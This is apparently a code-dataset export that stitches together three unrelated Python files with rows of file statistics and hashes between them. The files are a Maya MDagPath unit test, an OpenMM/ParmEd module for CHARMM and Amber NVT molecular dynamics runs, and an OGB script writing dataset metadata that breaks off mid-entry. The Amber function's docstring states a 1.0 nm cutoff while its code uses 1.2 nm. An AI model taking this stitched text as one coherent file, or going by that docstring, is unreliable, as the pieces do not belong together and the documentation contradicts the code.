self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|awesome:light')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|*:light')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|cube|cubeShape')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|cube|cubeShape')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|cube|intermediary1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|cube|intermediary1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|cube|intermediary2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|cube|intermediary2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|cube|template')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|cube|template')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape->|projectionCurve1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|projectionCurve1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|*|projectionCurve1_1|projectionCurve1_Shape1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|*|projectionCurve1_2|projectionCurve1_Shape2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|*|projectionCurve1_Shape1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|*|projectionCurve1_Shape2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
def testBnFindChildren(self):
dpRoot = OpenMaya.MDagPath.bnGet(pattern='|master')
dagPaths = list(dpRoot.bnFindChildren())
self.assertEqual(len(dagPaths), 28)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(fnType=OpenMaya.MFn.kPointLight))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light|awesome:lightShape'])
dagPaths = list(dpRoot.bnFindChildren(recursive=False))
self.assertEqual(len(dagPaths), 10)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome_node', '|master|circle', '|master|cube', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_2', '|master|sphere'])
dagPaths = list(dpRoot.bnFindChildren(traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 22)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape'])
dagPaths = list(dpRoot.bnFindChildren(pattern='.'))
self.assertEqual(len(dagPaths), 22)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape'])
dagPaths = list(dpRoot.bnFindChildren(pattern='.', traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 10)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome_node', '|master|circle', '|master|cube', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_2', '|master|sphere'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|:.'))
self.assertEqual(len(dagPaths), 9)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome_node', '|master|circle', '|master|cube', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_2', '|master|sphere'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|.:*'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|child_1'))
self.assertEqual(len(dagPaths), 0)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), [])
dagPaths = list(dpRoot.bnFindChildren(pattern='*|child_1'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|*|child_1'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|node'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*|node'))
self.assertEqual(len(dagPaths), 3)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|*|node'))
self.assertEqual(len(dagPaths), 3)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='..|node'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|..|node'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*|node', recursive=False))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*|awesome:*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape'])
dagPaths = list(dpRoot.bnFindChildren(pattern='+->*'))
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(pattern='+->+'))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(recursive=False, copy=False))
self.assertEqual(len(dagPaths), 10)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertTrue(all(dagPath is dagPaths[0] for dagPath in dagPaths))
# This should work in a normal API! But it's Maya we're talking about.
# dagPaths = list(dpRoot.bnFindChildren(fnType=OpenMaya.MFn.kUnderWorld))
# self.assertEqual(len(dagPaths), 1)
# self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
# self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->'])
dpRoot = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape')
dagPaths = list(dpRoot.bnFindChildren())
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(recursive=False))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*'))
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(pattern='->'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*->'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->'])
dagPaths = list(dpRoot.bnFindChildren(pattern='->*'))
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(pattern='->.'))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
def testBnGetChild(self):
dpRoot = OpenMaya.MDagPath.bnGet(pattern='|master')
self.assertIsNone(dpRoot.bnGetChild())
self.assertIsNone(dpRoot.bnGetChild(recursive=False))
self.assertIsNone(dpRoot.bnGetChild(traverseUnderWorld=False))
self.assertIsNone(dpRoot.bnGetChild(pattern='.'))
dagPath = dpRoot.bnGetChild(fnType=OpenMaya.MFn.kPointLight)
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light|awesome:lightShape')
dagPath = dpRoot.bnGetChild(pattern='|.:*')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light')
dagPath = dpRoot.bnGetChild(pattern='*|child_1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1')
dagPath = dpRoot.bnGetChild(pattern='|*|child_1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1')
dagPath = dpRoot.bnGetChild(pattern='|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|node')
dagPath = dpRoot.bnGetChild(pattern='..|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1|node')
dagPath = dpRoot.bnGetChild(pattern='|..|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1|node')
dagPath = dpRoot.bnGetChild(pattern='*|node', recursive=False)
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|node')
dpRoot = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape')
self.assertIsNone(dpRoot.bnGetChild())
dagPath = dpRoot.bnGetChild(recursive=False)
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->')
dagPath = dpRoot.bnGetChild(pattern='->')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->')
dagPath = dpRoot.bnGetChild(pattern='*->')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->')
def testBnGetParent(self):
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master')
self.assertIsNone(dagPath.bnGetParent())
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|node')
dpParent = dagPath.bnGetParent()
self.assertIsNot(dpParent, dagPath)
self.assertEqual(dpParent, OpenMaya.MDagPath.bnGet(pattern='|master'))
if __name__ == '__main__':
from tests.run import run
run('__main__')
| 77.887097
| 1,179
| 0.725777
| 4,758
| 43,461
| 6.551072
| 0.035729
| 0.084184
| 0.046198
| 0.076997
| 0.946936
| 0.932916
| 0.917806
| 0.890343
| 0.873661
| 0.865672
| 0
| 0.016162
| 0.12303
| 43,461
| 557
| 1,180
| 78.02693
| 0.801648
| 0.008836
| 0
| 0.567696
| 0
| 0
| 0.340856
| 0.261382
| 0
| 0
| 0
| 0
| 0.619952
| 1
| 0.019002
| false
| 0
| 0.019002
| 0
| 0.04038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c41c04167aab9904e34d89661d0b8a64d3bbe748
| 5,675
|
py
|
Python
|
molecules/sim/simulation/openmm_simulation.py
|
hengma1001/molecules
|
c6694cc77ef1eb246f3fdab1f201481d1bcaa07c
|
[
"MIT"
] | 2
|
2020-03-16T07:47:42.000Z
|
2021-05-12T11:39:51.000Z
|
molecules/sim/simulation/openmm_simulation.py
|
yngtodd/molecules
|
b16281ae3eda64891f603d23472092051c2bc244
|
[
"MIT"
] | 55
|
2018-02-10T23:22:15.000Z
|
2019-12-22T23:11:13.000Z
|
molecules/sim/simulation/openmm_simulation.py
|
hengma1001/molecules
|
c6694cc77ef1eb246f3fdab1f201481d1bcaa07c
|
[
"MIT"
] | 4
|
2018-08-06T19:49:35.000Z
|
2020-06-03T02:07:42.000Z
|
import simtk.openmm.app as app
import simtk.openmm as omm
import simtk.unit as u
import parmed as pmd
import random
def openmm_simulate_charmm_nvt(top_file, xyz_file, GPU_index=0, output_traj="output.dcd", output_log="output.log", report_time=10*u.picoseconds, sim_time=10*u.nanoseconds):
"""
Start and run an OpenMM NVT simulation with a Langevin integrator at a 2 fs
time step and 300 K. The cutoff distance for nonbonded interactions is set
at 1.2 nm and the LJ switch distance at 1.0 nm, which is commonly used with
the CHARMM force field. Long-range nonbonded interactions are handled with PME.
Parameters
----------
top_file : topology file (.top, .prmtop, ...)
This is the topology file that describes all the interactions within the MD
system.
xyz_file : coordinates file (.gro, .pdb, ...)
This is the molecule configuration file that contains all the atom positions
and the PBC (periodic boundary condition) box of the system.
GPU_index : Int or Str
The device index of the GPU to use for running the simulation. Use a string,
e.g. '0,1', to use more than one GPU.
output_traj : the trajectory file (.dcd)
This is the file that stores all the coordinate information of the MD
simulation results.
output_log : the log file (.log)
This file stores the MD simulation status, such as steps, time, potential
energy, temperature, speed, etc.
report_time : 10 ps
The program writes its information to the output every 10 ps by default
sim_time : 10 ns
The timespan of the simulation trajectory
"""
top = pmd.load_file(top_file, xyz = xyz_file)
system = top.createSystem(nonbondedMethod=app.PME, nonbondedCutoff=1.2*u.nanometer,
switchDistance=1.0*u.nanometer, constraints=app.HBonds)
dt = 0.002*u.picoseconds
integrator = omm.LangevinIntegrator(300*u.kelvin, 1/u.picosecond, dt)
try:
platform = omm.Platform_getPlatformByName("CUDA")
properties = {'DeviceIndex': str(GPU_index), 'CudaPrecision': 'mixed'}
except Exception:
platform = omm.Platform_getPlatformByName("OpenCL")
properties = {'DeviceIndex': str(GPU_index)}
simulation = app.Simulation(top.topology, system, integrator, platform, properties)
simulation.context.setPositions(top.positions)
simulation.minimizeEnergy()
report_freq = int(report_time/dt)
simulation.context.setVelocitiesToTemperature(10*u.kelvin, random.randint(1, 10000))
simulation.reporters.append(app.DCDReporter(output_traj, report_freq))
simulation.reporters.append(app.StateDataReporter(output_log,
report_freq, step=True, time=True, speed=True,
potentialEnergy=True, temperature=True, totalEnergy=True))
nsteps = int(sim_time/dt)
simulation.step(nsteps)
def openmm_simulate_amber_nvt(top_file, xyz_file, GPU_index=0, output_traj="output.dcd", output_log="output.log", report_time=10*u.picoseconds, sim_time=10*u.nanoseconds):
"""
Start and run an OpenMM NVT simulation with a Langevin integrator at a 2 fs
time step and 300 K. The cutoff distance for nonbonded interactions is set
at 1.0 nm, which is commonly used along with the Amber force field. Long-range
nonbonded interactions are handled with PME.
Parameters
----------
top_file : topology file (.top, .prmtop, ...)
This is the topology file that describes all the interactions within the MD
system.
xyz_file : coordinates file (.gro, .pdb, ...)
This is the molecule configuration file that contains all the atom positions
and the PBC (periodic boundary condition) box of the system.
GPU_index : Int or Str
The device index of the GPU to use for running the simulation. Use a string,
e.g. '0,1', to use more than one GPU.
output_traj : the trajectory file (.dcd)
This is the file that stores all the coordinate information of the MD
simulation results.
output_log : the log file (.log)
This file stores the MD simulation status, such as steps, time, potential
energy, temperature, speed, etc.
report_time : 10 ps
The program writes its information to the output every 10 ps by default
sim_time : 10 ns
The timespan of the simulation trajectory
"""
top = pmd.load_file(top_file, xyz = xyz_file)
system = top.createSystem(nonbondedMethod=app.PME, nonbondedCutoff=1.2*u.nanometer,
constraints=app.HBonds)
dt = 0.002*u.picoseconds
integrator = omm.LangevinIntegrator(300*u.kelvin, 1/u.picosecond, dt)
try:
platform = omm.Platform_getPlatformByName("CUDA")
properties = {'DeviceIndex': str(GPU_index), 'CudaPrecision': 'mixed'}
except Exception:
platform = omm.Platform_getPlatformByName("OpenCL")
properties = {'DeviceIndex': str(GPU_index)}
simulation = app.Simulation(top.topology, system, integrator, platform, properties)
simulation.context.setPositions(top.positions)
simulation.minimizeEnergy()
report_freq = int(report_time/dt)
simulation.context.setVelocitiesToTemperature(10*u.kelvin, random.randint(1, 10000))
simulation.reporters.append(app.DCDReporter(output_traj, report_freq))
simulation.reporters.append(app.StateDataReporter(output_log,
report_freq, step=True, time=True, speed=True,
potentialEnergy=True, temperature=True, totalEnergy=True))
nsteps = int(sim_time/dt)
simulation.step(nsteps)
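# --- Hedged usage sketch (not part of the original module) ---
# Minimal illustration of calling the CHARMM NVT driver defined above. The
# topology/coordinate file names and the GPU index are placeholders; running
# this for real requires OpenMM, ParmEd, and a CUDA or OpenCL device.
if __name__ == "__main__":
    openmm_simulate_charmm_nvt(
        "system.top", "system.pdb",
        GPU_index=0,
        output_traj="traj.dcd",
        output_log="sim.log",
        report_time=10 * u.picoseconds,
        sim_time=1 * u.nanoseconds,
    )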
| 39.964789
| 173
| 0.686167
| 736
| 5,675
| 5.206522
| 0.224185
| 0.016701
| 0.014092
| 0.037578
| 0.947547
| 0.947547
| 0.947547
| 0.936326
| 0.936326
| 0.936326
| 0
| 0.018307
| 0.229956
| 5,675
| 141
| 174
| 40.248227
| 0.858581
| 0.432952
| 0
| 0.823529
| 0
| 0
| 0.046496
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.098039
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c44ecfffe2ee056e29a965b69046c23d5f351233
| 4,217
|
py
|
Python
|
ogb/nodeproppred/make_master_file.py
|
yelongshen/ogb
|
293790ee77576375b40a3c7e0ead15be466963fe
|
[
"MIT"
] | null | null | null |
ogb/nodeproppred/make_master_file.py
|
yelongshen/ogb
|
293790ee77576375b40a3c7e0ead15be466963fe
|
[
"MIT"
] | null | null | null |
ogb/nodeproppred/make_master_file.py
|
yelongshen/ogb
|
293790ee77576375b40a3c7e0ead15be466963fe
|
[
"MIT"
] | 1
|
2021-02-14T04:39:46.000Z
|
2021-02-14T04:39:46.000Z
|
### script for writing meta information of datasets into master.csv
### for node property prediction datasets.
import pandas as pd
dataset_dict = {}
dataset_list = []
### add meta-information about protein function prediction task
name = "ogbn-proteins"
dataset_dict[name] = {"num tasks": 112, "num classes": 2, "eval metric": "rocauc", "task type": "binary classification"}
dataset_dict[name]["download_name"] = "proteinfunc"
dataset_dict[name]["version"] = 1
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
## For an undirected graph, we only store one direction of each edge. This flag allows us to add the inverse edges at pre-processing time
dataset_dict[name]["add_inverse_edge"] = True
dataset_dict[name]["has_node_attr"] = False
dataset_dict[name]["has_edge_attr"] = True
dataset_dict[name]["split"] = "species"
dataset_dict[name]["additional node files"] = 'species'
dataset_dict[name]['additional edge files'] = 'None'
dataset_dict[name]['is hetero'] = False
### add meta-information about product category prediction task
name = "ogbn-products"
dataset_dict[name] = {"num tasks": 1, "num classes": 47, "eval metric": "acc", "task type": "multiclass classification"}
dataset_dict[name]["download_name"] = "products"
dataset_dict[name]["version"] = 1
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
## For an undirected graph, we only store one direction of each edge. This flag allows us to add the inverse edges at pre-processing time
dataset_dict[name]["add_inverse_edge"] = True
dataset_dict[name]["has_node_attr"] = True
dataset_dict[name]["has_edge_attr"] = False
dataset_dict[name]["split"] = "sales_ranking"
dataset_dict[name]["additional node files"] = 'None'
dataset_dict[name]['additional edge files'] = 'None'
dataset_dict[name]['is hetero'] = False
### add meta-information about arxiv category prediction task
name = "ogbn-arxiv"
dataset_dict[name] = {"num tasks": 1, "num classes": 40, "eval metric": "acc", "task type": "multiclass classification"}
dataset_dict[name]["download_name"] = "arxiv"
dataset_dict[name]["version"] = 1
